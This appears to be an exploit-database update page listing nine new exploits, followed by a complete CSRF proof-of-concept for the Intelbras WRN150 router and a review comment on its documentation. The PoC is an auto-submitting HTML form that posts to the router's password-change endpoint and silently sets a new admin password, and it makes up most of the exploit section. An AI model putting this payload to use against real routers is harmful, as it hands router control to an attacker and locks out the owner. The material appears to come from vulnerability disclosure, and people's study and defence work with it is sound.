
9 changes to exploits/shellcodes

WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed
JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path
ChaosPro 2.0 - Buffer Overflow (SEH)
Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection
Part-DB 0.4 - Authentication Bypass
waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting
delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection
PHP-FPM + Nginx - Remote Code Execution
Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
Date: 2019-10-25
Exploit Author: Prof. Joas Antonio
Vendor Homepage: https://www.intelbras.com/pt-br/
Software Link: http://en.intelbras.com.br/node/25896
Version: 1.0.18
Tested on: Windows
CVE : N/A
####################
# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be
<html>
<body>
<form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
<input type="hidden" name="GO" value="system_password.asp">
<input type="hidden" name="SYSPSC" value="0">
<input class="text" type="password" name="SYSOPS" value="hack123"/>
<input class="text" type="password" name="SYSPS" value="mrrobot"/>
<input class="text" type="password" name="SYSPS2" value="mrrobot"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html> |
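
Review bot: The three password fields in the form are undocumented (SYSOPS carries one value, SYSPS and SYSPS2 carry the same second value), so the file does not say what the request needs in order to succeed or what it changes. If SYSOPS is the router's current password, state that in the header, because the request would then only work where that value is already known. The header should also name the finding in one sentence, namely that /goform/SysToolChangePwd accepts this POST with no anti-CSRF token among the submitted fields, and should mark 10.0.0.1 as an assumed LAN address. "Tested on: Windows" describes the client rather than the device, so the firmware version on the "Version:" line is the detail that identifies affected units.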